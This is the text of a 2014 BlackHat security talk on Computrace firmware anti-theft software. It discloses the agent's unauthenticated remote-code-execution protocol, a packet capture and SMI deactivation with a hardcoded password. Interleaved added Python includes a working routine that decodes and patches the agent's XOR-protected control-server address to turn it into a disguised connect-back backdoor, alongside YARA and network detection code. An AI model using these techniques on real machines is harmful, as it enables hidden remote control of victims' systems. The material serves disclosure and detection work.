
Absolute Backdoor Revisited

Vitaliy Kamlyuk, Kaspersky Lab
Sergey Belov, Kaspersky Lab
Anibal Sacco, Cubica Labs

BlackHat, Las Vegas
August, 2014
What is Computrace?
Computrace is an anti-theft software product developed by Absolute Software. It is embedded in the
BIOS as a PCI Option ROM or in the UEFI firmware, can be activated at system boot, and creates a
Windows service by dropping an executable file onto the Windows filesystem.

*Images are taken from US Patent 20060272020 A1


Why this research?
We discovered that some of our private laptops were running Absolute Computrace without the
prior consent of their legitimate owners.

Later we found a new computer on sale at a local retail shop which also had Computrace running
on it.

We decided to investigate who had activated Computrace on these computers, why and how, and
whether that created any security breach on our systems.
How does it work?
Computrace has 4 stages of operation:
1. The BIOS/UEFI module locates a FAT32/NTFS partition and injects code into the Windows native
application autochk.exe.
2. The modified autochk.exe registers a new system service for rpcnetp.exe.
3. rpcnetp.exe connects to the control server to download additional executable components and a
replacement for rpcnetp.exe, which is started as the service rpcnet each time the system boots.
4. rpcnet.exe connects to the control server each time the system starts. If the service/file is removed,
the procedure starts again from the beginning.
Remote Code Execution/Design Flaw
Computrace by design does remote code execution. The small rpcnetp.exe agent is easily exploitable
because it does not implement any server authentication mechanism. Assuming an attacker is able to
control the victim's network traffic (ARP poisoning, DNS hijacking, etc.), it is possible to execute arbitrary
code remotely. DEMO!

The protocol defines two primitives:
1. Read data from memory
2. Write data to memory
Remote Code Execution/Exploit
When the Computrace agent connects to a control server it updates itself to the more secure main agent,
rpcnet.exe. The main agent implements security checks which prevent simple RCE. However, the
implementation has a weakness that allows the security settings to be overridden easily, which enables
arbitrary code execution again. DEMO!
Sample communication session
1. c
2. s 7e ff ff ff ff 04 00 e5 de 00 70 08 96 e8 7e
3. c 7e e5 de 00 70 04 00 c0 fe 88 00 09 a9 f0 7e
4. s 7e ff ff ff ff 04 00 e5 de 00 70 19 94 f8 7e
5. c 7e e5 de 00 70 e5 de 00 70 84 00 c0 fe 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 1a 0f 21 7e
6. s 7e c0 fe 88 00 0c 00 2a b7 be 7e
7. c 7e e5 de 00 70 e5 de 00 70 0c 00 02 00 a4 03 05 01 28 0a 00 f0 73 00 2b 45 16 7e
8. s 7e c8 fe 88 00 04 00 3b 8f a2 7e
9. c 7e e5 de 00 70 e5 de 00 70 04 00 00 f0 73 00 3c 45 8c 7e
10. s 7e cc fe 88 00 0c 00 07 00 00 00 0c 93 00 00 d4 fe 88 00 4c 45 40 7e
11. c 7e e5 de 00 70 e5 de 00 70 04 00 a4 3c 1b 00 4d 46 04 7e
12. s 7e ac 3c 1b 00 02 00 78 05 5d c7 e6 7e
13. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 5e 67 f1 7e
14. s 7e d8 fe 88 00 04 00 ac 3c 1b 00 6e 93 68 7e
15. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 6f 41 83 7e
16. s 7e 3a 42 1b 00 02 00 78 05 7f 5b 1f 7e
17. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 78 23 55 7e
18. s 7e dc fe 88 00 04 00 08 7f 2f 7e
19. c 7e e5 de 00 70 e5 de 00 70 04 00 28 fd 88 00 09 03 c6 7e
20. s 7e 2c fd 88 00 04 00 19 9c 47 7e
21. c 7e e5 de 00 70 e5 de 00 70 04 00 e5 de 00 70 1a 05 66 7e
22. s 7e 3e 42 1b 00 04 00 e5 de 00 70 2a 09 5d 7e
23. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 2b 49 c3 7e
24. s 7e 32 42 1b 00 04 00 e5 de 00 70 3b f8 84 7e
25. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 3c 2b 15 7e
26. s 7e dc fe 88 00 04 00 3a 42 1b 00 4c cd 2f 7e
27. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 4d 45 a3 7e

Legend (s = control server, c = agent):
  7e           Separator, always 0x7e
  xx xx xx xx  Memory address (server) or SessionID (client)
  xx xx        Size of payload data
  xx ...       Payload data to be written (server) / payload data that was read by the client
  xx           Sequence number
  xx xx        Packet checksum
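The captured session above, decoded field by field. This parser is an added example and not code from the talk; the field layout comes from the slide's legend, the little-endian byte order of the address and size fields and the reading of an empty-payload server frame as a memory read request are inferred from the capture, and the checksum algorithm is not given on the page, so the checksum is carried as raw bytes and not verified:

```python
"""Decode Computrace agent frames from the session captured on the slide.

Added example, not the authors' code. Layout per the slide legend:
  7e | address (server) or session ID (client), 4 bytes | size, 2 bytes |
  payload | sequence number, 1 byte | checksum, 2 bytes | 7e
Assumptions not stated on the page: little-endian integers; a server frame
whose size is non-zero but which carries no payload is a read request; the
checksum algorithm is unknown here and is not checked.
"""
import struct
from dataclasses import dataclass

FLAG = 0x7E

# Frames 2-4 and 6-13 of the slide's session (frame 5, the 132-byte reply, omitted).
CAPTURE = """\
2. s 7e ff ff ff ff 04 00 e5 de 00 70 08 96 e8 7e
3. c 7e e5 de 00 70 04 00 c0 fe 88 00 09 a9 f0 7e
4. s 7e ff ff ff ff 04 00 e5 de 00 70 19 94 f8 7e
6. s 7e c0 fe 88 00 0c 00 2a b7 be 7e
7. c 7e e5 de 00 70 e5 de 00 70 0c 00 02 00 a4 03 05 01 28 0a 00 f0 73 00 2b 45 16 7e
8. s 7e c8 fe 88 00 04 00 3b 8f a2 7e
9. c 7e e5 de 00 70 e5 de 00 70 04 00 00 f0 73 00 3c 45 8c 7e
10. s 7e cc fe 88 00 0c 00 07 00 00 00 0c 93 00 00 d4 fe 88 00 4c 45 40 7e
11. c 7e e5 de 00 70 e5 de 00 70 04 00 a4 3c 1b 00 4d 46 04 7e
12. s 7e ac 3c 1b 00 02 00 78 05 5d c7 e6 7e
13. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 5e 67 f1 7e
"""


@dataclass
class Frame:
    direction: str    # "s" = control server -> agent, "c" = agent -> server
    header: tuple     # 4-byte fields before the size: (address,) or (session, session)
    size: int         # value of the 2-byte size field
    payload: bytes    # empty for a server read request
    seq: int
    checksum: bytes   # two raw bytes, algorithm not given on the page

    @property
    def address(self) -> int:
        return self.header[0]

    @property
    def kind(self) -> str:
        """Server frame with payload = write those bytes at address; without
        payload = read `size` bytes at address. Client frames are replies.
        Address 0xffffffff carries the session ID the agent echoes afterwards."""
        if self.direction == "s":
            return "write" if self.payload else "read"
        return "reply"


def parse_frame(direction: str, raw: bytes) -> Frame:
    if len(raw) < 10 or raw[0] != FLAG or raw[-1] != FLAG:
        raise ValueError("frame must start and end with 0x7e")
    body = raw[1:-1]
    # Server frames carry one 4-byte address; every client frame after the first
    # in this capture carries the session ID twice. Pick the header width whose
    # size field is consistent with the bytes left for payload + seq + checksum.
    for nfields in (1, 2):
        off = 4 * nfields
        present = len(body) - off - 2 - 3        # payload bytes actually present
        if present < 0:
            continue
        (size,) = struct.unpack_from("<H", body, off)
        if present == size or (present == 0 and direction == "s"):
            header = struct.unpack_from("<" + "I" * nfields, body, 0)
            payload = body[off + 2:off + 2 + present]
            seq = body[off + 2 + present]
            return Frame(direction, header, size, payload, seq, body[off + 3 + present:])
    raise ValueError("size field does not match frame length")


def parse_capture(text: str) -> list:
    """Parse lines of the form '<n>. <s|c> <hex bytes>' as printed on the slide."""
    frames = []
    for line in text.splitlines():
        _num, direction, *hexbytes = line.split()
        frames.append(parse_frame(direction, bytes.fromhex("".join(hexbytes))))
    return frames


def describe(f: Frame) -> str:
    if f.kind == "read":
        return f"server READ  {f.size:3d} bytes @ {f.address:#010x}"
    if f.kind == "write":
        return f"server WRITE {f.size:3d} bytes @ {f.address:#010x}: {f.payload.hex()}"
    return f"agent  reply session {f.header[0]:#010x}: {f.payload.hex()}"


if __name__ == "__main__":
    for frame in parse_capture(CAPTURE):
        print(describe(frame))
```

Run as a script it prints one line per frame: the server first pushes the session ID to the pseudo-address 0xffffffff, then reads 12 bytes at 0x0088fec0, reads 4 at 0x0088fec8, and writes 12 bytes at 0x0088fecc and 2 bytes at 0x001b3cac, which is the read/write memory primitive pair the previous slide describes, with nothing in the frame that authenticates who is sending it.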
Local attacks
● rpcnetp.exe (the small agent dropped by the BIOS/UEFI module) is the first component to
establish a connection with the control server
● Once connected, it exposes an interface that offers full system access to the control server
● It is currently used as a way to deploy the second-stage component (rpcnet.exe)
● Because of the legitimate nature of this software, it is whitelisted by most anti-malware vendors
○ Not digitally signed (hash-based whitelisting is used instead)
Local attacks (O brother, where art thou?)
In order to obtain the control server address, rpcnetp.exe relies on a small data chunk called the
Configuration Block.

This data block is placed in many locations in a fully deployed Computrace environment:
● Windows Registry
● Inter-partition space
● Embedded in rpcnetp.exe
Local attacks - Configuration Block
The configuration block stores information like the IP, port and reporting URL, as well as an
expiration date and AT commands (the agent has modem reporting capabilities too).

It is protected by an encryption method consisting of a single 8-bit XOR operation.

Note: Depending on the location of the block, the protection varies a bit. In the Windows registry it is
protected by two passes of an 8-bit XOR :)
Local attacks - rpcnetp.exe modification
This scheme can be easily abused, as the small agent blindly trusts the block content.

At our 2009 BlackHat talk we released a tool demonstrating redirection through registry modification.
This lets an attacker obtain a disguised connect-back method.

The same approach can be applied to rpcnetp.exe. Really simple:
● Find the configuration block
● Decode it
● Patch it
● Re-encode it

Additionally, a few NOPs can be added to force the connect back.
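The find/decode/patch/re-encode cycle above, and the "two passes of an 8-bit XOR" note from the previous slide, worked through on a constructed configuration block. This is an added example and not the authors' 2009 tool: the real Computrace block layout and XOR key are not on the page, so CONFIG, KEY, the field markers and the carrier image are all assumptions; the known-plaintext key recovery is keyed on the control-server domains the network-detection slide lists.

```python
"""Configuration Block protection: a single-byte XOR (two passes in the registry).

Added example, not the authors' tool. CONFIG, KEY, the HOST=/EXP= markers and
IMAGE are constructed stand-ins; the real block format and key are not on the
page. KNOWN_HOSTS are control-server domains the slides list.
"""

# Constructed sample block, not the real format.
CONFIG = b"HOST=search.namequery.com\x00PORT=80\x00URL=/report.asp\x00EXP=20141231\x00"
KEY = 0x5A                                        # assumed key
KNOWN_HOSTS = [b"namequery.com", b"absolute.com", b"nettrace.co.za"]


def xor1(data: bytes, key: int) -> bytes:
    """One pass of an 8-bit XOR over every byte."""
    return bytes(b ^ key for b in data)


def xor2(data: bytes, k1: int, k2: int) -> bytes:
    """Two passes (the registry variant). Identical to one pass with k1 ^ k2;
    with k1 == k2 the passes cancel and the block is stored in the clear."""
    return xor1(xor1(data, k1), k2)


def recover_key(blob: bytes, fragments=KNOWN_HOSTS) -> int:
    """A single-byte key leaks from any known plaintext byte: derive the key from
    one byte and confirm the rest of the fragment decodes under it."""
    for known in fragments:
        for i in range(len(blob) - len(known) + 1):
            k = blob[i] ^ known[0]
            if xor1(blob[i:i + len(known)], k) == known:
                return k
    raise ValueError("no known plaintext found under any single-byte key")


def find_block(image: bytes, key: int, marker: bytes = b"HOST=") -> int:
    """Offset of the encoded block inside a larger binary, located by searching
    for the encoded form of a field marker; -1 if absent."""
    return image.find(xor1(marker, key))


def redirect(image: bytes, key: int, old_host: bytes, new_host: bytes) -> bytes:
    """find -> decode -> patch -> re-encode. The block keeps its length (new host
    NUL-padded) so nothing after it moves; the agent has no integrity check
    that would notice the change."""
    if len(new_host) > len(old_host):
        raise ValueError("new host must fit in the existing field")
    off = find_block(image, key)
    if off < 0:
        raise ValueError("configuration block not found")
    end = image.index(xor1(b"EXP=", key), off)   # only the part before EXP= is patched
    plain = xor1(image[off:end], key)
    patched = plain.replace(old_host, new_host.ljust(len(old_host), b"\x00"), 1)
    return image[:off] + xor1(patched, key) + image[end:]


# Constructed carrier: a fake PE image with the encoded block embedded at offset 66.
IMAGE = b"MZ" + b"\x90" * 64 + xor1(CONFIG, KEY) + b"\xcc" * 32
```

recover_key works just as well on the registry copy: two XOR passes with keys k1 and k2 are recovered as the single key k1 ^ k2, which is why the second pass adds nothing.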


Local attacks - rpcnetp.exe modification
Not digitally signed binary + Whitelisted + Modification
= Dangerous connect-back mechanism

[ DEMO ]
How to detect Computrace?
The original Absolute Computrace can be detected in the process list. Check for one of the names:
1. rpcnetp.exe
2. rpcnet.exe

However, if someone renamed it and used it as a backdoor, it is recommended to scan the HDD with the
following Yara rule (download the free yara tool here: http://plusvic.github.io/yara/):

rule ComputraceAgent
{
    meta:
        description = "Absolute Computrace Agent Executable"
        thread_level = 3
        in_the_wild = true
    strings:
        $a = {D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04}   // agent code fragment
        $mz = {4d 5a}                                             // "MZ" PE header
        $b1 = {72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00}   // "rpcnetp.exe\0rpcnetp\0"
        $b2 = {54 61 67 49 64 00}                                 // "TagId\0"
    condition:
        ($mz at 0) and ($a or ($b1 and $b2))
}
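A pure-Python equivalent of the rule, as an added example (not the authors' code), for a triage box without the yara binary. The sample buffers are constructed to exercise the condition and are not real Computrace files:

```python
"""Pure-Python equivalent of the ComputraceAgent YARA rule above.

Added example, not the authors' code. SAMPLE_* buffers are constructed to
exercise the condition; they are not real binaries.
"""
from pathlib import Path

MZ = bytes.fromhex("4d5a")
A = bytes.fromhex("D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04")           # $a
B1 = bytes.fromhex("72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00")  # $b1 "rpcnetp.exe\0rpcnetp\0"
B2 = bytes.fromhex("54 61 67 49 64 00")                                        # $b2 "TagId\0"


def matches_computrace_agent(data: bytes) -> bool:
    """($mz at 0) and ($a or ($b1 and $b2)), evaluated on the file content,
    so a renamed agent still matches."""
    return data.startswith(MZ) and (A in data or (B1 in data and B2 in data))


def scan_tree(root) -> list:
    """Walk a directory and return paths whose content matches the rule."""
    hits = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        try:
            data = p.read_bytes()
        except OSError:
            continue                  # locked or unreadable file; skip, do not abort the scan
        if matches_computrace_agent(data):
            hits.append(str(p))
    return hits


# Constructed samples (not real binaries): an MZ blob carrying both strings,
# the same strings without an MZ header, and an MZ blob with only one of them.
SAMPLE_AGENT = MZ + b"\x90" * 62 + B1 + b"\x00" * 16 + B2
SAMPLE_NO_MZ = b"\x00\x00" + B1 + B2
SAMPLE_PARTIAL = MZ + B1
```

scan_tree(r"C:\Windows\System32") on a Windows host gives the same verdicts as running the rule with yara over that directory, including for a copy of the agent saved under another name.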
How about network detection?
The original Absolute Computrace can be detected on the network by discovering a connection to one of
the following hosts:
● 209.53.113.223
● search.namequery.com
● search2.namequery.com
● search64.namequery.com
● search.us.namequery.com
● bh.namequery.com
● namequery.nettrace.co.za
● m229.absolute.com or any m*.absolute.com

Another method is to detect the Computrace protocol generically by looking for the following binary data
in an HTTP server response:

7e ff ff ff ff 04 00 ?? ?? ?? ?? 08 ?? ?? 7e
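The signature above turned into a matcher over an HTTP response. This is an added example and not the authors' detection; the HTTP headers are constructed, the frame bytes are frame 2 of the session captured earlier on the page, and reading the four wildcard bytes as the session ID follows that capture:

```python
"""Match the generic Computrace protocol signature inside an HTTP response.

Added example, not the authors' detection. Slide pattern:
  7e ff ff ff ff 04 00 ?? ?? ?? ?? 08 ?? ?? 7e
Each ?? is one arbitrary byte. In the captured session the four wildcard bytes
are the session ID the server assigns and 08 is the first sequence number.
SAMPLE_RESPONSE wraps the slide's frame 2 in constructed HTTP headers.
"""
import re

SIGNATURE = re.compile(rb"\x7e\xff\xff\xff\xff\x04\x00(.{4})\x08(.{2})\x7e", re.DOTALL)


def split_http(response: bytes):
    """Split a raw HTTP response into (status line, body). Assumes CRLF headers."""
    head, _, body = response.partition(b"\r\n\r\n")
    return head.split(b"\r\n", 1)[0], body


def find_computrace_hello(body: bytes):
    """Return (offset, session_id) of the first matching frame in the body, or None.
    The session ID is decoded little-endian, as in the capture."""
    m = SIGNATURE.search(body)
    if m is None:
        return None
    return m.start(), int.from_bytes(m.group(1), "little")


def inspect_response(response: bytes):
    """Convenience wrapper: status line plus the match result for the body."""
    status, body = split_http(response)
    return status, find_computrace_hello(body)


# Constructed HTTP wrapper around frame 2 of the slide's session.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 15\r\n"
    b"\r\n"
    + bytes.fromhex("7e ff ff ff ff 04 00 e5 de 00 70 08 96 e8 7e")
)
```

The pattern pins the sequence byte to 08, so it fires only on the first frame of a session; the repeated session-assignment frame 4 in the capture (sequence byte 19) does not match it, which is fine for detection since every session starts with a matching frame.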
Who activated Computrace?
First, our investigation showed that the Computrace modules on our machines were first executed on
the day the computers were purchased at a retail shop. This indicates that Computrace was
preactivated by the manufacturer.

Second, we purchased a brand new laptop and found traces of Absolute modules in the slack space of
the hard drive. When we recovered the files we found the Absolute Certification Tool, which presumably
was used by the vendor to test Computrace. The tool performs a full cycle of activation, check and
deactivation of the BIOS/UEFI dropper, and fails at the last stage, leaving the system with persistence
activated.

We believe that persistence was erroneously activated due to a bug in this tool. We don't think this bug
was introduced on purpose.
How to deactivate Computrace?
This is very vendor specific, but the most common way is to generate a System Management Interrupt:
asm volatile("outb %%al, %%dx" : "=a" (result) : "d"(port), "a"(magic), "b"(password));
● "port" - SMI I/O port number. Usually 0xB2, but it can vary.
● "magic" - SMI signature, a vendor-dependent value in EAX (0x544241CA in our case)
● "password" - magic value in EBX used during the activation procedure

The password hardcoded in the Absolute Certification Tool is 0x12345678

"result" does not report the status of the current operation, so a password brute force was not possible
in our case. The lack of password verification means that the next call will reactivate the agent with a
new password.

# dmidecode
Handle 0x0020, DMI type 11, 5 bytes
OEM Strings
String 1: voIHKSB3UVm0R
String 2: N1bTA2-Di8CG0
String 3: 5nbewuF6GBX2S
Thank you!
Log of events:
02/03/2014: we sent a report about vulnerability in Computrace protocol design to Absolute Software.
03/12/2014: no reaction from Absolute Software. We published report.
03/13/2014: Absolute Software released an infosheet denying the breach and prior notification from us.
...
25/06/2014: we discovered and notified Absolute Software about a second RCE vulnerability. Absolute Software confirmed receiving our
analysis but denied the existence of vulnerabilities.

Vitaly Kamluk, Principal Security Researcher, Kaspersky Lab
@vkamluk, Vitaly.Kamluk {could be at} kaspersky {dot} com

Sergey Belov, Principal Security Researcher, Kaspersky Lab
Sergey.Belov {definitely at} kaspersky {dot} com

Anibal Sacco, Security Researcher / Co-founder, Cubica Labs
@hannibals, asacco {could be at} cubicalabs {dot} com
